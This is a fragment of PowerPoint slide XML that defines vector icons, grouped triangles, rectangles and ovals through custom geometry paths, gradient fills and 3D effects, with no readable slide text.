                        <a:pt x="2889" y="21407"/>
                        <a:pt x="3746" y="20590"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3877" y="20460"/>
                        <a:pt x="3984" y="20321"/>
                        <a:pt x="4069" y="20174"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="6867" y="16517"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="8601" y="14255"/>
                        <a:pt x="10606" y="12027"/>
                        <a:pt x="12824" y="9913"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15281" y="7570"/>
                        <a:pt x="17557" y="5758"/>
                        <a:pt x="20329" y="3749"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20321" y="3741"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="20400" y="3684"/>
                        <a:pt x="20473" y="3635"/>
                        <a:pt x="20543" y="3570"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21402" y="2753"/>
                        <a:pt x="21402" y="1427"/>
                        <a:pt x="20543" y="606"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19742" y="-161"/>
                        <a:pt x="18472" y="-193"/>
                        <a:pt x="17615" y="468"/>
                      </a:cubicBezTo>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16" name="AutoShape 55"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="8448675" y="2649538"/>
                  <a:ext cx="71438" cy="74613"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="+- 0 10803 213"/>
                    <a:gd name="T1" fmla="*/ T0 w 21180"/>
                    <a:gd name="T2" fmla="+- 0 10801 203"/>
                    <a:gd name="T3" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T4" fmla="+- 0 10803 213"/>
                    <a:gd name="T5" fmla="*/ T4 w 21180"/>
                    <a:gd name="T6" fmla="+- 0 10801 203"/>
                    <a:gd name="T7" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T8" fmla="+- 0 10803 213"/>
                    <a:gd name="T9" fmla="*/ T8 w 21180"/>
                    <a:gd name="T10" fmla="+- 0 10801 203"/>
                    <a:gd name="T11" fmla="*/ 10801 h 21196"/>
                    <a:gd name="T12" fmla="+- 0 10803 213"/>
                    <a:gd name="T13" fmla="*/ T12 w 21180"/>
                    <a:gd name="T14" fmla="+- 0 10801 203"/>
                    <a:gd name="T15" fmla="*/ 10801 h 21196"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T1" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T5" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T9" y="T11"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T13" y="T15"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="21180" h="21196">
                      <a:moveTo>
                        <a:pt x="8372" y="11356"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="6122" y="13508"/>
                        <a:pt x="3675" y="15444"/>
                        <a:pt x="1144" y="17292"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="963" y="17388"/>
                        <a:pt x="786" y="17493"/>
                        <a:pt x="637" y="17645"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="-213" y="18457"/>
                        <a:pt x="-213" y="19774"/>
                        <a:pt x="637" y="20585"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1464" y="21380"/>
                        <a:pt x="2796" y="21397"/>
                        <a:pt x="3652" y="20641"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3665" y="20649"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="6364" y="18673"/>
                        <a:pt x="8988" y="16581"/>
                        <a:pt x="11419" y="14263"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13759" y="12030"/>
                        <a:pt x="15873" y="9685"/>
                        <a:pt x="17715" y="7283"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="20663" y="3427"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="20654" y="3419"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="21386" y="2600"/>
                        <a:pt x="21357" y="1379"/>
                        <a:pt x="20541" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19697" y="-203"/>
                        <a:pt x="18323" y="-203"/>
                        <a:pt x="17468" y="608"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17313" y="760"/>
                        <a:pt x="17197" y="937"/>
                        <a:pt x="17094" y="1114"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="14228" y="4857"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="12526" y="7090"/>
                        <a:pt x="10552" y="9275"/>
                        <a:pt x="8372" y="11356"/>
                      </a:cubicBezTo>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="25" name="Group 26"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5338" y="2772"/>
              <a:ext cx="2054" cy="3672"/>
              <a:chOff x="5960997" y="2484779"/>
              <a:chExt cx="1304471" cy="2341845"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="26" name="Group 27"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="5960997" y="2484779"/>
                <a:ext cx="1304471" cy="2341845"/>
                <a:chOff x="5960997" y="2484779"/>
                <a:chExt cx="1304471" cy="2341845"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:grpSp>
              <p:nvGrpSpPr>
                <p:cNvPr id="28" name="Group 29"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm>
                  <a:off x="5960997" y="2484779"/>
                  <a:ext cx="1304471" cy="1802479"/>
                  <a:chOff x="3149600" y="2480384"/>
                  <a:chExt cx="1201204" cy="1660005"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="30" name="等腰三角形 51"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm flipV="1">
                    <a:off x="3149600" y="3200883"/>
                    <a:ext cx="1201204" cy="939506"/>
                  </a:xfrm>
                  <a:prstGeom prst="triangle">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:gradFill>
                    <a:gsLst>
                      <a:gs pos="0">
                        <a:schemeClr val="accent3"/>
                      </a:gs>
                      <a:gs pos="100000">
                        <a:srgbClr val="EEECE1">
                          <a:lumMod val="90000"/>
                          <a:alpha val="0"/>
                        </a:srgbClr>
                      </a:gs>
                    </a:gsLst>
                    <a:lin ang="5400000" scaled="0"/>
                  </a:gradFill>
                  <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="31" name="矩形 52"/>
                  <p:cNvSpPr/>
                  <p:nvPr/>
                </p:nvSpPr>
                <p:spPr>
                  <a:xfrm>
                    <a:off x="3630724" y="2480384"/>
                    <a:ext cx="720080" cy="720080"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                  <a:solidFill>
                    <a:schemeClr val="accent3"/>
                  </a:solidFill>
                  <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                    <a:noFill/>
                    <a:prstDash val="solid"/>
                  </a:ln>
                  <a:effectLst>
                    <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                      <a:srgbClr val="000000">
                        <a:alpha val="35000"/>
                      </a:srgbClr>
                    </a:outerShdw>
                  </a:effectLst>
                  <a:scene3d>
                    <a:camera prst="isometricOffAxis2Top">
                      <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                    </a:camera>
                    <a:lightRig rig="chilly" dir="t">
                      <a:rot lat="0" lon="0" rev="600000"/>
                    </a:lightRig>
                  </a:scene3d>
                  <a:sp3d extrusionH="666750"/>
                </p:spPr>
                <p:txBody>
                  <a:bodyPr anchor="ctr"/>
                  <a:lstStyle/>
                  <a:p>
                    <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                      <a:spcBef>
                        <a:spcPts val="0"/>
                      </a:spcBef>
                      <a:spcAft>
                        <a:spcPts val="0"/>
                      </a:spcAft>
                      <a:defRPr/>
                    </a:pPr>
                    <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                      <a:solidFill>
                        <a:sysClr val="window" lastClr="FFFFFF"/>
                      </a:solidFill>
                      <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                      <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                    </a:endParaRPr>
                  </a:p>
                </p:txBody>
              </p:sp>
            </p:grpSp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="29" name="Oval 30"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="6312532" y="4240732"/>
                  <a:ext cx="585892" cy="585892"/>
                </a:xfrm>
                <a:prstGeom prst="ellipse">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ln w="3810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id-ID"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="27" name="AutoShape 112"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="6453017" y="4367800"/>
                <a:ext cx="328308" cy="328869"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T1" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T2" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T3" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T4" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T5" fmla="*/ 10800 h 21600"/>
                  <a:gd name="T6" fmla="*/ 10510 w 21020"/>
                  <a:gd name="T7" fmla="*/ 10800 h 21600"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="0">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="0">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="0" t="0" r="r" b="b"/>
                <a:pathLst>
                  <a:path w="21020" h="21600">
                    <a:moveTo>
                      <a:pt x="18846" y="7946"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="17740" y="9091"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="17740" y="8939"/>
                      <a:pt x="17758" y="8792"/>
                      <a:pt x="17744" y="8636"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17629" y="7331"/>
                      <a:pt x="17036" y="6068"/>
                      <a:pt x="16074" y="5080"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15004" y="3980"/>
                      <a:pt x="13585" y="3348"/>
                      <a:pt x="12180" y="3345"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13268" y="2218"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="13812" y="1659"/>
                      <a:pt x="14572" y="1350"/>
                      <a:pt x="15403" y="1350"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16460" y="1350"/>
                      <a:pt x="17546" y="1840"/>
                      <a:pt x="18381" y="2696"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19165" y="3500"/>
                      <a:pt x="19631" y="4499"/>
                      <a:pt x="19698" y="5510"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="19760" y="6453"/>
                      <a:pt x="19457" y="7317"/>
                      <a:pt x="18846" y="7946"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="5828" y="19329"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="5813" y="18424"/>
                      <a:pt x="5454" y="17481"/>
                      <a:pt x="4730" y="16739"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4046" y="16034"/>
                      <a:pt x="3150" y="15628"/>
                      <a:pt x="2257" y="15592"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2911" y="13157"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2959" y="12995"/>
                      <a:pt x="3052" y="12835"/>
                      <a:pt x="3168" y="12695"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4485" y="11726"/>
                      <a:pt x="6512" y="12012"/>
                      <a:pt x="7920" y="13460"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9409" y="14990"/>
                      <a:pt x="9639" y="17230"/>
                      <a:pt x="8492" y="18568"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8416" y="18609"/>
                      <a:pt x="8339" y="18648"/>
                      <a:pt x="8256" y="18675"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8256" y="18675"/>
                      <a:pt x="5828" y="19329"/>
                      <a:pt x="5828" y="19329"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="2737" y="20164"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2665" y="20181"/>
                      <a:pt x="2443" y="20239"/>
                      <a:pt x="2291" y="20249"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1751" y="20244"/>
                      <a:pt x="1313" y="19792"/>
                      <a:pt x="1313" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1321" y="19124"/>
                      <a:pt x="1365" y="18929"/>
                      <a:pt x="1380" y="18857"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="2071" y="16283"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="2822" y="16261"/>
                      <a:pt x="3630" y="16562"/>
                      <a:pt x="4265" y="17215"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4911" y="17878"/>
                      <a:pt x="5214" y="18725"/>
                      <a:pt x="5181" y="19504"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="5181" y="19504"/>
                      <a:pt x="2737" y="20164"/>
                      <a:pt x="2737" y="20164"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="6888" y="11179"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="6280" y="10927"/>
                      <a:pt x="5642" y="10783"/>
                      <a:pt x="5004" y="10774"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="10063" y="5536"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10838" y="4759"/>
                      <a:pt x="11966" y="4536"/>
                      <a:pt x="13077" y="4819"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13077" y="4819"/>
                      <a:pt x="6888" y="11179"/>
                      <a:pt x="6888" y="11179"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="9717" y="13672"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="9473" y="13258"/>
                      <a:pt x="9194" y="12859"/>
                      <a:pt x="8848" y="12505"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="8447" y="12093"/>
                      <a:pt x="7986" y="11770"/>
                      <a:pt x="7507" y="11498"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="13767" y="5064"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="14259" y="5288"/>
                      <a:pt x="14729" y="5607"/>
                      <a:pt x="15145" y="6035"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15500" y="6398"/>
                      <a:pt x="15775" y="6806"/>
                      <a:pt x="15987" y="7229"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15987" y="7229"/>
                      <a:pt x="9717" y="13672"/>
                      <a:pt x="9717" y="13672"/>
                    </a:cubicBezTo>
                    <a:close/>
                    <a:moveTo>
                      <a:pt x="10519" y="16061"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="10465" y="15452"/>
                      <a:pt x="10298" y="14854"/>
                      <a:pt x="10047" y="14288"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="16257" y="7906"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="16637" y="9140"/>
                      <a:pt x="16442" y="10429"/>
                      <a:pt x="15610" y="11284"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="15604" y="11290"/>
                      <a:pt x="15598" y="11293"/>
                      <a:pt x="15593" y="11298"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="15602" y="11306"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="10525" y="16565"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="10527" y="16397"/>
                      <a:pt x="10534" y="16232"/>
                      <a:pt x="10519" y="16061"/>
                    </a:cubicBezTo>
                    <a:moveTo>
                      <a:pt x="19308" y="1741"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="18228" y="632"/>
                      <a:pt x="16805" y="0"/>
                      <a:pt x="15403" y="0"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14220" y="0"/>
                      <a:pt x="13131" y="450"/>
                      <a:pt x="12335" y="1266"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9138" y="4577"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9129" y="4585"/>
                      <a:pt x="9118" y="4592"/>
                      <a:pt x="9108" y="4602"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="9103" y="4608"/>
                      <a:pt x="9100" y="4614"/>
                      <a:pt x="9095" y="4620"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="9096" y="4621"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2310" y="11647"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="1998" y="11966"/>
                      <a:pt x="1771" y="12364"/>
                      <a:pt x="1645" y="12797"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="102" y="18541"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="100" y="18557"/>
                      <a:pt x="0" y="19008"/>
                      <a:pt x="0" y="19237"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="20541"/>
                      <a:pt x="1030" y="21599"/>
                      <a:pt x="2302" y="21599"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2554" y="21599"/>
                      <a:pt x="3044" y="21475"/>
                      <a:pt x="3062" y="21473"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="8630" y="19969"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="9054" y="19839"/>
                      <a:pt x="9439" y="19604"/>
                      <a:pt x="9750" y="19283"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="19776" y="8899"/>
                    </a:lnTo>
                    <a:cubicBezTo>
                      <a:pt x="21600" y="7023"/>
                      <a:pt x="21394" y="3881"/>
                      <a:pt x="19308" y="1741"/>
                    </a:cubicBezTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:schemeClr val="accent3"/>
              </a:solid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nvGrpSpPr>
            <p:cNvPr id="32" name="Group 33"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2750" y="2772"/>
              <a:ext cx="2054" cy="3712"/>
              <a:chOff x="3269603" y="2494718"/>
              <a:chExt cx="1304471" cy="2340121"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="33" name="Group 34"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="3269603" y="2494718"/>
                <a:ext cx="1304471" cy="1802479"/>
                <a:chOff x="3149600" y="2480384"/>
                <a:chExt cx="1201204" cy="1660005"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="38" name="等腰三角形 51"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm flipV="1">
                  <a:off x="3149600" y="3200883"/>
                  <a:ext cx="1201204" cy="939506"/>
                </a:xfrm>
                <a:prstGeom prst="triangle">
                  <a:avLst/>
                </a:prstGeom>
                <a:gradFill>
                  <a:gsLst>
                    <a:gs pos="0">
                      <a:schemeClr val="accent2"/>
                    </a:gs>
                    <a:gs pos="100000">
                      <a:srgbClr val="EEECE1">
                        <a:lumMod val="90000"/>
                        <a:alpha val="0"/>
                      </a:srgbClr>
                    </a:gs>
                  </a:gsLst>
                  <a:lin ang="5400000" scaled="0"/>
                </a:gradFill>
                <a:ln w="25400" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="39" name="矩形 52"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="3630724" y="2480384"/>
                  <a:ext cx="720080" cy="720080"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom>
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
                  <a:noFill/>
                  <a:prstDash val="solid"/>
                </a:ln>
                <a:effectLst>
                  <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
                    <a:srgbClr val="000000">
                      <a:alpha val="35000"/>
                    </a:srgbClr>
                  </a:outerShdw>
                </a:effectLst>
                <a:scene3d>
                  <a:camera prst="isometricOffAxis2Top">
                    <a:rot lat="19390491" lon="18812960" rev="21592509"/>
                  </a:camera>
                  <a:lightRig rig="chilly" dir="t">
                    <a:rot lat="0" lon="0" rev="600000"/>
                  </a:lightRig>
                </a:scene3d>
                <a:sp3d extrusionH="666750"/>
              </p:spPr>
              <p:txBody>
                <a:bodyPr anchor="ctr"/>
                <a:lstStyle/>
                <a:p>
                  <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                    <a:spcBef>
                      <a:spcPts val="0"/>
                    </a:spcBef>
                    <a:spcAft>
                      <a:spcPts val="0"/>
                    </a:spcAft>
                    <a:defRPr/>
                  </a:pPr>
                  <a:endParaRPr lang="zh-CN" altLang="en-US" kern="0" dirty="0">
                    <a:solidFill>
                      <a:sysClr val="window" lastClr="FFFFFF"/>
                    </a:solidFill>
                    <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                    <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="34" name="Oval 35"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3628031" y="4248947"/>
                <a:ext cx="585892" cy="585892"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="381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id-ID"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:grpSp>
            <p:nvGrpSpPr>
              <p:cNvPr id="35" name="Group 36"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="3754948" y="4377739"/>
                <a:ext cx="328308" cy="328308"/>
                <a:chOff x="3498967" y="3049909"/>
                <a:chExt cx="464344" cy="464344"/>
              </a:xfrm>
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="36" name="AutoShape 126"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="3498967" y="3049909"/>
                  <a:ext cx="464344" cy="4643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3499" y="14850"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="9772" y="14850"/>
                        <a:pt x="6749" y="11827"/>
                        <a:pt x="6749" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6749" y="4372"/>
                        <a:pt x="9772" y="1350"/>
                        <a:pt x="13499" y="1350"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17227" y="1350"/>
                        <a:pt x="20249" y="4372"/>
                        <a:pt x="20249" y="8100"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20249" y="11827"/>
                        <a:pt x="17227" y="14850"/>
                        <a:pt x="13499" y="14850"/>
                      </a:cubicBezTo>
                      <a:moveTo>
                        <a:pt x="3236" y="20042"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3019" y="20266"/>
                        <a:pt x="2718" y="20408"/>
                        <a:pt x="2382" y="20408"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1724" y="20408"/>
                        <a:pt x="1191" y="19875"/>
                        <a:pt x="1191" y="19218"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1191" y="18881"/>
                        <a:pt x="1332" y="18580"/>
                        <a:pt x="1557" y="18363"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="1551" y="18358"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6996" y="12913"/>
                      </a:lnTo>
                      <a:cubicBezTo>
                        <a:pt x="7472" y="13555"/>
                        <a:pt x="8039" y="14122"/>
                        <a:pt x="8680" y="14599"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8680" y="14599"/>
                        <a:pt x="3236" y="20042"/>
